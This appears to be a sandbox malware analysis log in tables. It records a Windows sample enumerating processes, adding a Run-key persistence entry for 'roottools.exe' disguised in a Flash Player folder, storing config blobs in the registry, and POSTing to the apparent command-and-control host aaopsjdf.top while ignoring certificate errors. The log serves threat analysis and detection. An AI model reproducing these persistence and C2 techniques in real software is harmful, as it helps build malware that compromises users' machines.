| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
|
For performance reasons, the remaining 66 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = size, size_out = 196608 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608, size_out = 196608 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
18 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:54:59 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw, accept_types = 802816, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ,Ä, url = aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ,Ä, url = aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 1688 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, size = 1776, type = REG_BINARY |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:55:08 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw, accept_types = 802816, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close 0Zñ, url = aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close 0Zñ, url = aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 3224 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, size = 720 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = size, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 | |
| System | Sleep | duration = 600000 milliseconds (600.000 seconds) |
|
1 |
